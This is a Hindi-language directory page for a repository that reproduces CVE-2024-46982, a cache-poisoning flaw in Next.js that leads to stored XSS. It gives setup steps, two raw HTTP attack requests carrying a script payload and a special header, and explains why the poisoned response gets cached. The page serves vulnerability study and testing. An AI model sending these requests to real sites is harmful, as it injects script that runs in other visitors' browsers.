Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-46982-Reproduction — CVE-2024-46982 का पुनरुत्पादन | Kitploit
उपकरण/GitHubGitHub/samuel871211/cve-2024-46982-reproduction
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षा
GitHubsamuel871211/cve-2024-46982-reproduction

CVE-2024-46982-Reproduction

CVE-2024-46982 का पुनरुत्पादन

रिपॉजिटरी देखें
47 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शुरू करना

  1. Node.js LTS स्थापित करें
  2. npm install
  3. npm run build
  4. npm run start

शोषण 1: कैश पॉइज़निंग के माध्यम से संग्रहीत XSS

  1. किसी भी HTTP क्लाइंट का उपयोग करके निम्नलिखित HTTP अनुरोध (हमला अनुरोध) भेजें।
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack 2. किसी भी वेब ब्राउज़र का उपयोग करके http://localhost:3000 (सामान्य अनुरोध) पर जाएँ। CVE-2024-46982-normal

शोषण 2: कैश पॉइज़निंग के माध्यम से संग्रहीत XSS

  1. किसी भी HTTP क्लाइंट का उपयोग करके निम्नलिखित HTTP अनुरोध (हमला अनुरोध) भेजें, सुनिश्चित करें कि आप "UiKoKFFGnF1td3mMyeDX5" को अपने ".next/BUILD_ID" से बदल दें। CVE-2024-46982-build-id
root@kitploit:~
GET /_next/data/UiKoKFFGnF1td3mMyeDX5/poc.json HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack-2 2. किसी भी वेब ब्राउज़र का उपयोग करके http://localhost:3000 (सामान्य अनुरोध) पर जाएँ। CVE-2024-46982-normal

यह कैसे काम करता है ?

  1. x-now-route-matches Next.js द्वारा मान्यता प्राप्त एक कस्टम HTTP हैडर है। जब यह मौजूद होता है, तो Next.js HTTP अनुरोध को "SSG" (Static Site Generation) के रूप में मानेगा, जिससे HTTP प्रतिक्रिया कैश की जा सकती है (Cache-Control: s-maxage=1, stale-while-revalidate)।

  2. ?__nextDataReq=1 Next.js द्वारा मान्यता प्राप्त एक क्वेरीस्ट्रिंग है। जब यह मौजूद होता है, तो Next.js HTTP अनुरोध को "Retrieving __NEXT_DATA__" के रूप में मानेगा।

पूरा विवरण श्रेय अनुभाग में पाया जा सकता है।

श्रेय

  • https://zhero-web-sec.github.io/research-and-things/nextjs-cache-and-chains-the-stale-elixir
टूल डाउनलोड करें